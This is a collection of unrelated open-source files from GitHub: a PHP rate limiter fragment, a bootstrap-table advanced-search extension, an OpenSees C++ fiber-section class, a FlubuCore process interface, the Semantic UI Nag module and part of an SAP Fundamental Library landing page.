            // Bucket is empty: persist the zero allowance, report a full
            // window as the reset time, and reject the request.
            $user->saveAllowance($request, $action, 0, $current);
            $this->addRateLimitHeaders($response, $limit, 0, $window);
            throw new TooManyRequestsHttpException($this->errorMessage);
        } else {
            // Consume one unit; the reset header is the (truncated) number of
            // seconds until the bucket is full again at the replenish rate.
            $user->saveAllowance($request, $action, $allowance - 1, $current);
            $this->addRateLimitHeaders($response, $limit, $allowance - 1, (int) (($limit - $allowance) * $window / $limit));
        }
    }

    /**
     * Adds the rate limit headers to the response.
     * Does nothing when [[enableRateLimitHeaders]] is false.
     * @param Response $response
     * @param int $limit the maximum number of allowed requests during a period
     * @param int $remaining the remaining number of allowed requests within the current period
     * @param int $reset the number of seconds to wait before having maximum number of allowed requests again
     */
    public function addRateLimitHeaders($response, $limit, $remaining, $reset)
    {
        if ($this->enableRateLimitHeaders) {
            $response->getHeaders()
                ->set('X-Rate-Limit-Limit', $limit)
                ->set('X-Rate-Limit-Remaining', $remaining)
                ->set('X-Rate-Limit-Reset', $reset);
        }
    }
}
{ "pile_set_name": "Github" }
/**
 * @author: aperez <aperez@datadec.es>
 * @version: v2.0.0
 *
 * @update Dennis Hernández <http://djhvscf.github.io/Blog>
 */

!function($) {
    'use strict';

    // Module-wide flag: the one-time table-height adjustment in load() has run.
    // NOTE(review): shared across all tables on the page, not per instance.
    var firstLoad = false;

    var sprintf = $.fn.bootstrapTable.utils.sprintf;

    // Builds (on first call) and shows the Bootstrap modal that hosts the
    // advanced-search form for the table identified by that.options.idTable.
    // Subsequent calls just re-show the already-created modal.
    var showAvdSearch = function(pColumns, searchTitle, searchText, that) {
        if (!$("#avdSearchModal" + "_" + that.options.idTable).hasClass("modal")) {
            var vModal = sprintf("<div id=\"avdSearchModal%s\" class=\"modal fade\" tabindex=\"-1\" role=\"dialog\" aria-labelledby=\"mySmallModalLabel\" aria-hidden=\"true\">", "_" + that.options.idTable);
            vModal += "<div class=\"modal-dialog modal-xs\">";
            vModal += " <div class=\"modal-content\">";
            vModal += " <div class=\"modal-header\">";
            vModal += " <button type=\"button\" class=\"close\" data-dismiss=\"modal\" aria-hidden=\"true\" >&times;</button>";
            vModal += sprintf(" <h4 class=\"modal-title\">%s</h4>", searchTitle);
            vModal += " </div>";
            vModal += " <div class=\"modal-body modal-body-custom\">";
            vModal += sprintf(" <div class=\"container-fluid\" id=\"avdSearchModalContent%s\" style=\"padding-right: 0px;padding-left: 0px;\" >", "_" + that.options.idTable);
            vModal += " </div>";
            vModal += " </div>";
            vModal += " </div>";
            vModal += " </div>";
            vModal += "</div>";

            $("body").append($(vModal));

            var vFormAvd = createFormAvd(pColumns, searchText, that),
                timeoutId = 0;;

            $('#avdSearchModalContent' + "_" + that.options.idTable).append(vFormAvd.join(''));

            // Debounce per-field searches by options.searchTimeOut so typing
            // does not trigger a refresh on every keystroke.
            $('#' + that.options.idForm).off('keyup blur', 'input').on('keyup blur', 'input', function (event) {
                clearTimeout(timeoutId);
                timeoutId = setTimeout(function () {
                    that.onColumnAdvancedSearch(event);
                }, that.options.searchTimeOut);
            });

            $("#btnCloseAvd" + "_" + that.options.idTable).click(function() {
                $("#avdSearchModal" + "_" + that.options.idTable).modal('hide');
            });

            $("#avdSearchModal" + "_" + that.options.idTable).modal();
        } else {
            $("#avdSearchModal" + "_" + that.options.idTable).modal();
        }
    };

    // Returns an array of HTML fragments forming the advanced-search form:
    // one labelled text input per visible, searchable, non-checkbox column,
    // plus a close button. Input id/name are set to the column's field.
    var createFormAvd = function(pColumns, searchText, that) {
        var htmlForm = [];
        htmlForm.push(sprintf('<form class="form-horizontal" id="%s" action="%s" >', that.options.idForm, that.options.actionForm));

        for (var i in pColumns) {
            var vObjCol = pColumns[i];
            if (!vObjCol.checkbox && vObjCol.visible && vObjCol.searchable) {
                htmlForm.push('<div class="form-group">');
                htmlForm.push(sprintf('<label class="col-sm-4 control-label">%s</label>', vObjCol.title));
                htmlForm.push('<div class="col-sm-6">');
                htmlForm.push(sprintf('<input type="text" class="form-control input-md" name="%s" placeholder="%s" id="%s">', vObjCol.field, vObjCol.title, vObjCol.field));
                htmlForm.push('</div>');
                htmlForm.push('</div>');
            }
        }

        htmlForm.push('<div class="form-group">');
        htmlForm.push('<div class="col-sm-offset-9 col-sm-3">');
        htmlForm.push(sprintf('<button type="button" id="btnCloseAvd%s" class="btn btn-default" >%s</button>', "_" + that.options.idTable, searchText));
        htmlForm.push('</div>');
        htmlForm.push('</div>');
        htmlForm.push('</form>');

        return htmlForm;
    };

    // New table options introduced by this extension.
    $.extend($.fn.bootstrapTable.defaults, {
        advancedSearch: false,
        idForm: 'advancedSearch',
        actionForm: '',
        idTable: undefined,
        onColumnAdvancedSearch: function (field, text) {
            return false;
        }
    });

    $.extend($.fn.bootstrapTable.defaults.icons, {
        advancedSearchIcon: 'glyphicon-chevron-down'
    });

    // Register the jQuery event fired when a per-column search runs.
    $.extend($.fn.bootstrapTable.Constructor.EVENTS, {
        'column-advanced-search.bs.table': 'onColumnAdvancedSearch'
    });

    $.extend($.fn.bootstrapTable.locales, {
        formatAdvancedSearch: function() {
            return 'Advanced search';
        },
        formatAdvancedCloseButton: function() {
            return "Close";
        }
    });

    $.extend($.fn.bootstrapTable.defaults, $.fn.bootstrapTable.locales);

    // Keep references to the core prototype methods we wrap below.
    var BootstrapTable = $.fn.bootstrapTable.Constructor,
        _initToolbar = BootstrapTable.prototype.initToolbar,
        _load = BootstrapTable.prototype.load,
        _initSearch = BootstrapTable.prototype.initSearch;

    // Wraps initToolbar: after core setup, prepend the "advanced search"
    // toolbar button (only when search, advancedSearch and idTable are set).
    BootstrapTable.prototype.initToolbar = function() {
        _initToolbar.apply(this, Array.prototype.slice.apply(arguments));

        if (!this.options.search) {
            return;
        }

        if (!this.options.advancedSearch) {
            return;
        }

        if (!this.options.idTable) {
            return;
        }

        var that = this,
            html = [];

        html.push(sprintf('<div class="columns columns-%s btn-group pull-%s" role="group">', this.options.buttonsAlign, this.options.buttonsAlign));
        html.push(sprintf('<button class="btn btn-default%s' + '" type="button" name="advancedSearch" aria-label="advanced search" title="%s">', that.options.iconSize === undefined ? '' : ' btn-' + that.options.iconSize, that.options.formatAdvancedSearch()));
        html.push(sprintf('<i class="%s %s"></i>', that.options.iconsPrefix, that.options.icons.advancedSearchIcon))
        html.push('</button></div>');

        that.$toolbar.prepend(html.join(''));

        that.$toolbar.find('button[name="advancedSearch"]')
            .off('click').on('click', function() {
                showAvdSearch(that.columns, that.options.formatAdvancedSearch(), that.options.formatAdvancedCloseButton(), that);
            });
    };

    // Wraps load: on the first load of an advanced-search table, grow the
    // table view by 10px to make room (guarded by the shared firstLoad flag).
    BootstrapTable.prototype.load = function(data) {
        _load.apply(this, Array.prototype.slice.apply(arguments));

        if (!this.options.advancedSearch) {
            return;
        }

        if (typeof this.options.idTable === 'undefined') {
            return;
        } else {
            if (!firstLoad) {
                var height = parseInt($(".bootstrap-table").height());
                height += 10;
                $("#" + this.options.idTable).bootstrapTable("resetView", {height: height});
                firstLoad = true;
            }
        }
    };

    // Wraps initSearch: after core filtering, additionally keep only rows
    // matching EVERY per-column filter in filterColumnsPartial
    // (case-insensitive substring match on the formatted cell value).
    BootstrapTable.prototype.initSearch = function () {
        _initSearch.apply(this, Array.prototype.slice.apply(arguments));

        if (!this.options.advancedSearch) {
            return;
        }

        var that = this;
        var fp = $.isEmptyObject(this.filterColumnsPartial) ? null : this.filterColumnsPartial;

        this.data = fp ? $.grep(this.data, function (item, i) {
            for (var key in fp) {
                var fval = fp[key].toLowerCase();
                var value = item[key];
                // Run the column formatter (if any) so the filter matches what
                // the user actually sees in the cell.
                value = $.fn.bootstrapTable.utils.calculateObjectValue(that.header, that.header.formatters[$.inArray(key, that.header.fields)], [value, item, i], value);

                if (!($.inArray(key, that.header.fields) !== -1 && (typeof value === 'string' || typeof value === 'number') && (value + '').toLowerCase().indexOf(fval) !== -1)) {
                    return false;
                }
            }
            return true;
        }) : this.data;
    };

    // Handler for input events in the advanced-search form: record/remove the
    // per-column filter (input id == column field), reset to page 1, rerun the
    // search pipeline and fire the column-advanced-search event.
    BootstrapTable.prototype.onColumnAdvancedSearch = function (event) {
        var text = $.trim($(event.currentTarget).val());
        var $field = $(event.currentTarget)[0].id;

        if ($.isEmptyObject(this.filterColumnsPartial)) {
            this.filterColumnsPartial = {};
        }
        if (text) {
            this.filterColumnsPartial[$field] = text;
        } else {
            delete this.filterColumnsPartial[$field];
        }

        this.options.pageNumber = 1;
        this.onSearch(event);
        this.updatePagination();
        this.trigger('column-advanced-search', $field, text);
    };
}(jQuery);
{ "pile_set_name": "Github" }
/* ****************************************************************** **
** OpenSees - Open System for Earthquake Engineering Simulation       **
** Pacific Earthquake Engineering Research Center                     **
**                                                                    **
**                                                                    **
** (C) Copyright 1999, The Regents of the University of California    **
** All Rights Reserved.                                               **
**                                                                    **
** Commercial use of this program without express permission of the   **
** University of California, Berkeley, is strictly prohibited. See    **
** file 'COPYRIGHT' in main directory for information on usage and    **
** redistribution, and for a DISCLAIMER OF ALL WARRANTIES.            **
**                                                                    **
** Developed by:                                                      **
** Frank McKenna (fmckenna@ce.berkeley.edu)                           **
** Gregory L. Fenves (fenves@ce.berkeley.edu)                         **
** Filip C. Filippou (filippou@ce.berkeley.edu)                       **
**                                                                    **
** ****************************************************************** */

// $Revision: 1.3 $
// $Date: 2010-02-04 19:10:34 $
// $Source: /usr/local/cvs/OpenSees/SRC/material/section/WFFiberSection2d.cpp,v $

// Written: MHS
// Created: Aug 2001
//
// Description: This file contains the class definition for
// WFFiberSection2d.h. WFFiberSection2d provides the abstraction of a
// rectangular section discretized by fibers. The section stiffness and
// stress resultants are obtained by summing fiber contributions.
// The fiber stresses are the 11, 12, and 13 components of stress, from
// which all six beam stress resultants are obtained.

#include <stdlib.h>

#include <Channel.h>
#include <Vector.h>
#include <Matrix.h>
#include <classTags.h>
#include <WFFiberSection2d.h>
#include <ID.h>
#include <FEM_ObjectBroker.h>
#include <UniaxialMaterial.h>

// constructors:
// Builds a wide-flange (I) section discretized into fibers: nftf fibers
// through each flange thickness and nfdw fibers through the web depth,
// all sharing copies of the same uniaxial material.
//   D  = total section depth     Tw = web thickness
//   Bf = flange width            Tf = flange thickness
// NOTE(review): theMaterials and matData are inherited FiberSection2d
// members; this relies on the base default constructor having sized them
// for numFibers entries -- verify against FiberSection2d before changing.
WFFiberSection2d::WFFiberSection2d(int tag, UniaxialMaterial &theMat,
                                   double D, double Tw, double Bf, double Tf,
                                   int Nfdw, int Nftf):
  FiberSection2d(),
  d(D), tw(Tw), bf(Bf), tf(Tf), nfdw(Nfdw), nftf(Nftf)
{
  int numFibers = nfdw + 2*nftf;

  // One material copy per fiber; a failed copy is logged but not fatal here.
  for (int i = 0; i < numFibers; i++) {
    theMaterials[i] = theMat.getCopy();

    if (theMaterials[i] == 0)
      opserr << "WFFiberSection2d::WFFiberSection2d -- failed to get copy of beam fiber" << endln;
  }

  double dw = d-2*tf;        // clear web depth between the flanges

  double a_f = bf*tf/nftf;   // area of one flange fiber
  double a_w = dw*tw/nfdw;   // area of one web fiber

  int loc = 0;

  double yIncr = tf/nftf;
  double yStart = 0.5*d - 0.5*yIncr;

  double *AFibers = new double[numFibers];
  double *yFibers = new double[numFibers];

  // Flange fibers: fill the top flange from the outside in, mirroring each
  // fiber into the bottom flange (the section is symmetric about mid-depth).
  for (loc = 0; loc < nftf; loc++) {
    AFibers[loc] = a_f;
    yFibers[loc] = yStart - yIncr*loc;
    AFibers[numFibers-loc-1] = a_f;
    yFibers[numFibers-loc-1] = -yFibers[loc];
  }

  // Web fibers: top of the web down to the bottom.
  yIncr = dw/nfdw;
  yStart = 0.5*dw - 0.5*yIncr;

  int count = 0;
  for ( ; loc < numFibers-nftf; loc++, count++) {
    AFibers[loc] = a_w;
    yFibers[loc] = yStart - yIncr*count;
  }

  // Pack (y, A) pairs into the base-class fiber data array; y is stored
  // negated (same convention read back in getStressResultantSensitivity).
  for (int i = 0; i < numFibers; i++) {
    matData[i*2] = -yFibers[i];
    matData[i*2+1] = AFibers[i];
  }

  delete [] yFibers;
  delete [] AFibers;
}

// constructor for blank object that recvSelf needs to be invoked upon
WFFiberSection2d::WFFiberSection2d():
  FiberSection2d(),
  d(0.0), tw(0.0), bf(0.0), tf(0.0), nfdw(0), nftf(0)
{
}

// destructor:
// Fiber materials and data arrays are owned by the FiberSection2d base.
WFFiberSection2d::~WFFiberSection2d()
{
}

// Returns a fresh WFFiberSection2d rebuilt from this section's geometry,
// using a copy of the first fiber's material for every fiber.
SectionForceDeformation*
WFFiberSection2d::getCopy(void)
{
  WFFiberSection2d *theCopy =
    new WFFiberSection2d (this->getTag(), *theMaterials[0], d, tw, bf, tf, nfdw, nftf);

  return theCopy;
}

// Parallel/database send is not implemented; always fails with -1.
int
WFFiberSection2d::sendSelf(int commitTag, Channel &theChannel)
{
  return -1;
}

// Parallel/database receive is not implemented; always fails with -1.
int
WFFiberSection2d::recvSelf(int commitTag, Channel &theChannel,
                           FEM_ObjectBroker &theBroker)
{
  return -1;
}

// Prints the section geometry, then delegates to the base class for the
// per-fiber output.
void
WFFiberSection2d::Print(OPS_Stream &s, int flag)
{
  s << "\nWFFiberSection2d, tag: " << this->getTag() << endln;
  s << "\tSection depth:    " << d << endln;
  s << "\tWeb thickness:    " << tw << endln;
  s << "\tFlange width:     " << bf << endln;
  s << "\tFlange thickness: " << tf << endln;

  FiberSection2d::Print(s, flag);
}

// Sensitivity of the stress resultants w.r.t. parameter gradIndex: the base
// class contribution plus each fiber's material stress sensitivity times its
// area (axial term) and times its stored y (moment term).
// NOTE: returns a reference to a function-local static Vector, so the result
// is overwritten by the next call (and is not safe for concurrent use).
const Vector &
WFFiberSection2d::getStressResultantSensitivity(int gradIndex, bool conditional)
{
  static Vector ds;

  // get material stress contribution
  ds = FiberSection2d::getStressResultantSensitivity(gradIndex, conditional);

  double y, A, stressGradient;
  int loc = 0;
  for (int i = 0; i < numFibers; i++) {
    y = matData[loc++];    // y as stored (negated in the constructor)
    A = matData[loc++];
    stressGradient = theMaterials[i]->getStressSensitivity(gradIndex,true);
    stressGradient = stressGradient * A;

    ds(0) += stressGradient;        // axial resultant sensitivity
    ds(1) += stressGradient * y;    // moment resultant sensitivity
  }

  return ds;
}
{ "pile_set_name": "Github" }
namespace FlubuCore.Tasks.Process { public interface IExternalProcess<out T> where T : ITask { /// <summary> /// Set the full file path of the executable file. /// </summary> /// <param name="executableFullFilePath"></param> /// <returns></returns> T Executable(string executableFullFilePath); /// <summary> /// Add argument for executable. /// </summary> /// <param name="arg"></param> /// <param name="maskArg">If <c>true</c> argument is masked. Otherwise not.</param> /// <returns></returns> T WithArguments(string arg, bool maskArg); /// <summary> /// Add arguments for executable. /// </summary> /// <param name="args"></param> /// <returns></returns> T WithArguments(params string[] args); /// <summary> /// Clear all arguments for the command line. /// </summary> /// <returns></returns> T ClearArguments(); /// <summary> /// Set the working folder for the executable. /// </summary> /// <param name="folder"></param> /// <returns></returns> T WorkingFolder(string folder); /// <summary> /// Do not log output to the console. /// </summary> /// <returns></returns> T DoNotLogOutput(); } }
{ "pile_set_name": "Github" }
/*! * # Semantic UI - Nag * http://github.com/semantic-org/semantic-ui/ * * * Released under the MIT license * http://opensource.org/licenses/MIT * */ ;(function ($, window, document, undefined) { "use strict"; window = (typeof window != 'undefined' && window.Math == Math) ? window : (typeof self != 'undefined' && self.Math == Math) ? self : Function('return this')() ; $.fn.nag = function(parameters) { var $allModules = $(this), moduleSelector = $allModules.selector || '', time = new Date().getTime(), performance = [], query = arguments[0], methodInvoked = (typeof query == 'string'), queryArguments = [].slice.call(arguments, 1), returnedValue ; $allModules .each(function() { var settings = ( $.isPlainObject(parameters) ) ? $.extend(true, {}, $.fn.nag.settings, parameters) : $.extend({}, $.fn.nag.settings), className = settings.className, selector = settings.selector, error = settings.error, namespace = settings.namespace, eventNamespace = '.' + namespace, moduleNamespace = namespace + '-module', $module = $(this), $close = $module.find(selector.close), $context = (settings.context) ? 
$(settings.context) : $('body'), element = this, instance = $module.data(moduleNamespace), moduleOffset, moduleHeight, contextWidth, contextHeight, contextOffset, yOffset, yPosition, timer, module, requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame || window.msRequestAnimationFrame || function(callback) { setTimeout(callback, 0); } ; module = { initialize: function() { module.verbose('Initializing element'); $module .on('click' + eventNamespace, selector.close, module.dismiss) .data(moduleNamespace, module) ; if(settings.detachable && $module.parent()[0] !== $context[0]) { $module .detach() .prependTo($context) ; } if(settings.displayTime > 0) { setTimeout(module.hide, settings.displayTime); } module.show(); }, destroy: function() { module.verbose('Destroying instance'); $module .removeData(moduleNamespace) .off(eventNamespace) ; }, show: function() { if( module.should.show() && !$module.is(':visible') ) { module.debug('Showing nag', settings.animation.show); if(settings.animation.show == 'fade') { $module .fadeIn(settings.duration, settings.easing) ; } else { $module .slideDown(settings.duration, settings.easing) ; } } }, hide: function() { module.debug('Showing nag', settings.animation.hide); if(settings.animation.show == 'fade') { $module .fadeIn(settings.duration, settings.easing) ; } else { $module .slideUp(settings.duration, settings.easing) ; } }, onHide: function() { module.debug('Removing nag', settings.animation.hide); $module.remove(); if (settings.onHide) { settings.onHide(); } }, dismiss: function(event) { if(settings.storageMethod) { module.storage.set(settings.key, settings.value); } module.hide(); event.stopImmediatePropagation(); event.preventDefault(); }, should: { show: function() { if(settings.persist) { module.debug('Persistent nag is set, can show nag'); return true; } if( module.storage.get(settings.key) != settings.value.toString() ) { module.debug('Stored value is 
not set, can show nag', module.storage.get(settings.key)); return true; } module.debug('Stored value is set, cannot show nag', module.storage.get(settings.key)); return false; } }, get: { storageOptions: function() { var options = {} ; if(settings.expires) { options.expires = settings.expires; } if(settings.domain) { options.domain = settings.domain; } if(settings.path) { options.path = settings.path; } return options; } }, clear: function() { module.storage.remove(settings.key); }, storage: { set: function(key, value) { var options = module.get.storageOptions() ; if(settings.storageMethod == 'localstorage' && window.localStorage !== undefined) { window.localStorage.setItem(key, value); module.debug('Value stored using local storage', key, value); } else if(settings.storageMethod == 'sessionstorage' && window.sessionStorage !== undefined) { window.sessionStorage.setItem(key, value); module.debug('Value stored using session storage', key, value); } else if($.cookie !== undefined) { $.cookie(key, value, options); module.debug('Value stored using cookie', key, value, options); } else { module.error(error.noCookieStorage); return; } }, get: function(key, value) { var storedValue ; if(settings.storageMethod == 'localstorage' && window.localStorage !== undefined) { storedValue = window.localStorage.getItem(key); } else if(settings.storageMethod == 'sessionstorage' && window.sessionStorage !== undefined) { storedValue = window.sessionStorage.getItem(key); } // get by cookie else if($.cookie !== undefined) { storedValue = $.cookie(key); } else { module.error(error.noCookieStorage); } if(storedValue == 'undefined' || storedValue == 'null' || storedValue === undefined || storedValue === null) { storedValue = undefined; } return storedValue; }, remove: function(key) { var options = module.get.storageOptions() ; if(settings.storageMethod == 'localstorage' && window.localStorage !== undefined) { window.localStorage.removeItem(key); } else if(settings.storageMethod == 
'sessionstorage' && window.sessionStorage !== undefined) { window.sessionStorage.removeItem(key); } // store by cookie else if($.cookie !== undefined) { $.removeCookie(key, options); } else { module.error(error.noStorage); } } }, setting: function(name, value) { module.debug('Changing setting', name, value); if( $.isPlainObject(name) ) { $.extend(true, settings, name); } else if(value !== undefined) { if($.isPlainObject(settings[name])) { $.extend(true, settings[name], value); } else { settings[name] = value; } } else { return settings[name]; } }, internal: function(name, value) { if( $.isPlainObject(name) ) { $.extend(true, module, name); } else if(value !== undefined) { module[name] = value; } else { return module[name]; } }, debug: function() { if(!settings.silent && settings.debug) { if(settings.performance) { module.performance.log(arguments); } else { module.debug = Function.prototype.bind.call(console.info, console, settings.name + ':'); module.debug.apply(console, arguments); } } }, verbose: function() { if(!settings.silent && settings.verbose && settings.debug) { if(settings.performance) { module.performance.log(arguments); } else { module.verbose = Function.prototype.bind.call(console.info, console, settings.name + ':'); module.verbose.apply(console, arguments); } } }, error: function() { if(!settings.silent) { module.error = Function.prototype.bind.call(console.error, console, settings.name + ':'); module.error.apply(console, arguments); } }, performance: { log: function(message) { var currentTime, executionTime, previousTime ; if(settings.performance) { currentTime = new Date().getTime(); previousTime = time || currentTime; executionTime = currentTime - previousTime; time = currentTime; performance.push({ 'Name' : message[0], 'Arguments' : [].slice.call(message, 1) || '', 'Element' : element, 'Execution Time' : executionTime }); } clearTimeout(module.performance.timer); module.performance.timer = setTimeout(module.performance.display, 500); }, display: 
function() { var title = settings.name + ':', totalTime = 0 ; time = false; clearTimeout(module.performance.timer); $.each(performance, function(index, data) { totalTime += data['Execution Time']; }); title += ' ' + totalTime + 'ms'; if(moduleSelector) { title += ' \'' + moduleSelector + '\''; } if( (console.group !== undefined || console.table !== undefined) && performance.length > 0) { console.groupCollapsed(title); if(console.table) { console.table(performance); } else { $.each(performance, function(index, data) { console.log(data['Name'] + ': ' + data['Execution Time']+'ms'); }); } console.groupEnd(); } performance = []; } }, invoke: function(query, passedArguments, context) { var object = instance, maxDepth, found, response ; passedArguments = passedArguments || queryArguments; context = element || context; if(typeof query == 'string' && object !== undefined) { query = query.split(/[\. ]/); maxDepth = query.length - 1; $.each(query, function(depth, value) { var camelCaseValue = (depth != maxDepth) ? 
value + query[depth + 1].charAt(0).toUpperCase() + query[depth + 1].slice(1) : query ; if( $.isPlainObject( object[camelCaseValue] ) && (depth != maxDepth) ) { object = object[camelCaseValue]; } else if( object[camelCaseValue] !== undefined ) { found = object[camelCaseValue]; return false; } else if( $.isPlainObject( object[value] ) && (depth != maxDepth) ) { object = object[value]; } else if( object[value] !== undefined ) { found = object[value]; return false; } else { module.error(error.method, query); return false; } }); } if ( $.isFunction( found ) ) { response = found.apply(context, passedArguments); } else if(found !== undefined) { response = found; } if($.isArray(returnedValue)) { returnedValue.push(response); } else if(returnedValue !== undefined) { returnedValue = [returnedValue, response]; } else if(response !== undefined) { returnedValue = response; } return found; } }; if(methodInvoked) { if(instance === undefined) { module.initialize(); } module.invoke(query); } else { if(instance !== undefined) { instance.invoke('destroy'); } module.initialize(); } }) ; return (returnedValue !== undefined) ? returnedValue : this ; }; $.fn.nag.settings = { name : 'Nag', silent : false, debug : false, verbose : false, performance : true, namespace : 'Nag', // allows cookie to be overridden persist : false, // set to zero to require manually dismissal, otherwise hides on its own displayTime : 0, animation : { show : 'slide', hide : 'slide' }, context : false, detachable : false, expires : 30, domain : false, path : '/', // type of storage to use storageMethod : 'cookie', // value to store in dismissed localstorage/cookie key : 'nag', value : 'dismiss', error: { noCookieStorage : '$.cookie is not included. A storage solution is required.', noStorage : 'Neither $.cookie or store is defined. A storage solution is required for storing state', method : 'The method you called is not defined.' 
}, className : { bottom : 'bottom', fixed : 'fixed' }, selector : { close : '.close.icon' }, speed : 500, easing : 'easeOutQuad', onHide: function() {} }; // Adds easing $.extend( $.easing, { easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; } }); })( jQuery, window, document );
{ "pile_set_name": "Github" }
--- title: Homepage keywords: Homepage sidebar: toc: false permalink: index.html layout: default-no-sidebar topnavhidden: true footerhidden: true --- <style> .main-content { height: 100vh !important; background-color: #ffffff !important; position: relative; } </style> <header style="width: 100%;"> <div class="header-section" id="headerSection"> <div class="header-section__hamburger"> <button id="hamburgerToggle" class="sap-icon--menu2 header-section__sap-icon--menu2" onclick="toggleHamburger()" aria-label="Open/Close Main Navigation"></button> </div> <div class="header-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/logo_text.png" alt="Fundamental Library Styles Logo and Text" /> </div> <!-- id="headerLinks" --> <nav id="responsiveMenu" class="header-section__links"> <h2 class="vh">Main Navigation</h2> <ul> <li><a href="#libraries">Libraries</a></li> <li><a href="#features">Key Features</a></li> <li><a href="#about">About</a></li> <li><a href="#design">Design</a></li> <li><a href="#learn">Learn More</a></li> <li><a href="#community">Community</a></li> <li><a href="mailto:fundamental@sap.com" target="_blank">Email Us</a></li> </ul> </nav> </div> <div class="intro-section" id="intro-section"> <div class="intro-section__container"> <img class="intro-section__logo" src="{{site.baseurl}}/images/land-page-assets/logo.svg" alt="Fundamental Library Logo" /> <h1 class="intro-section__text"><span class="vh">Fundamental Library - </span>An open source and community driven project to provide a consistent user interface across web applications.</h1> </div> </div> </header> <main style="width: 100%;"> <section class="libraries-section" id="libraries"> <h2 class="libraries-section__title">Fundamental Library</h2> <div class="libraries-section__container"> <div class="libraries-section__item"> <div> <img src="{{site.baseurl}}/images/land-page-assets/css_html.svg" alt="Logos of the official W3C HTML5 and CSS specifications" class="libraries-section__logo" /> <h3 
class="libraries-section__item-title">Fundamental Library Styles</h3> <p class="libraries-section__text">Delivers a Fiori 3 component library for building SAP user interfaces with any web technology.</p> </div> <div class="libraries-section__links"> <a class="libraries-section__more" href="https://sap.github.io/fundamental-styles/" target="_blank">Learn More <span class="vh">about Fundamental Library Styles</span></a> <a class="libraries-section__more" href="https://github.com/SAP/fundamental-styles" target="_blank">GitHub</a> </div> </div> <div class="libraries-section__item"> <div> <img src="{{site.baseurl}}/images/land-page-assets/angular.svg" alt="Logo of the AngularJS Framework" class="libraries-section__logo" /> <h3 class="libraries-section__item-title">Fundamental Library for Angular</h3> <p class="libraries-section__text">Provides an Angular implementation of the components designed in Fundamental-Styles.</p> </div> <div class="libraries-section__links"> <a class="libraries-section__more" href="https://sap.github.io/fundamental-ngx/" target="_blank">Learn More <span class="vh">about Fundamental Library for Angular</span></a> <a class="libraries-section__more" href="https://github.com/SAP/fundamental-ngx" target="_blank">GitHub</a> </div> </div> <div class="libraries-section__item"> <div> <img src="{{site.baseurl}}/images/land-page-assets/react.svg" alt="Logo of the React Framework" class="libraries-section__logo" /> <h3 class="libraries-section__item-title">Fundamental Library for React</h3> <p class="libraries-section__text">Offers a React implementation of the components designed in Fundamental Styles.</p> </div> <div class="libraries-section__links"> <a class="libraries-section__more" href="https://sap.github.io/fundamental-react/" target="_blank">Learn More <span class="vh">about Fundamental Library for React</span></a> <a class="libraries-section__more" href="https://github.com/SAP/fundamental-react" target="_blank">GitHub</a> </div> </div> <div 
class="libraries-section__item"> <div> <img src="{{site.baseurl}}/images/land-page-assets/vue.svg" alt="Logo of the Vue.js Framework" class="libraries-section__logo" /> <h3 class="libraries-section__item-title">Fundamental Library for Vue</h3> <p class="libraries-section__text">Supplies a Vue implementation of the components designed in Fundamental Styles.</p> </div> <div class="libraries-section__links"> <a class="libraries-section__more" href="https://sap.github.io/fundamental-vue/" target="_blank">Learn More <span class="vh">about Fundamental Library for Vue</span></a> <a class="libraries-section__more" href="https://github.com/SAP/fundamental-vue" target="_blank">GitHub</a> </div> </div> </div> </section> <section class="features-section" id="features"> <h2 class="features-section__title">Key Features</h2> <div class="features-section__container"> <div class="features-section__item"> <img src="{{site.baseurl}}/images/land-page-assets/foundational.png" alt="Pictogram of a stone wall" class="features-section__logo" /> <h3 class="features-section__item-title">Foundational</h3> <p class="features-section__text">Focuses on web standards; basic elements and simple patterns.</p> </div> <div class="features-section__item"> <img src="{{site.baseurl}}/images/land-page-assets/modular.png" alt="Pictogram of stacked boxes" class="features-section__logo" /> <h3 class="features-section__item-title">Modular</h3> <p class="features-section__text">Revolves around self-contained components, while encapsulating styles and behaviours.</p> </div> <div class="features-section__item"> <img src="{{site.baseurl}}/images/land-page-assets/flexible.png" alt="Pictogram of Arrows" class="features-section__logo" /> <h3 class="features-section__item-title">Flexible</h3> <p class="features-section__text">Encompasses theming capabilities and combines basic blocks to create complex components.</p> </div> <div class="features-section__item"> <img 
src="{{site.baseurl}}/images/land-page-assets/collaborative.png" alt="Pictogram of people speaking" class="features-section__logo" /> <h3 class="features-section__item-title">Collaborative</h3> <p class="features-section__text">Welcomes multiple contributors within its community and allows for fast release cycles.</p> </div> </div> </section> <section class="about-section" id="about"> <h2 class="about-section__title">More about Fundamental Library</h2> <div class="about-section__container"> <p class="about-section__item">Ensuring a consistent look and feel, while harmonizing multiple products and applications, is a demanding and expensive task. It entails rebuilding them from the ground up and accommodating them to SAP UX standards. The Fundamental Libraries grew out of a need to address just that.</p> <p class="about-section__item">Fundamentals comprises a set of libraries that cover the most common UI components, patterns and layouts. It offers a design system and component library that allows teams the flexibility to quickly implement consistent UX with Fiori 3, without needing to change the frontend framework or library.</p> <p class="about-section__item">Fundamentals also tackles accessibility by using the proper semantic HTML tags such as buttons or anchor tags. By using the right HTML tag, the browsers cover about 80% of the accessibility requirements and the Fundamental Libraries team aims to cover the rest. Find access to the old version of Fundamentals <a href="{{site.baseurl}}/old.html">here</a>.</p> </div> </section> <section class="section" id="design"> <h2 class="section__title">Design</h2> <p class="section__text"> Our UI Kit bundle includes ready-to-use, state-of-the-art drafts of SAP layouts, patterns and components in Sketch. You are welcome to use the UI kit to visualize your SAP app. They are easy to use and will provide a realistic impression of your final designs. 
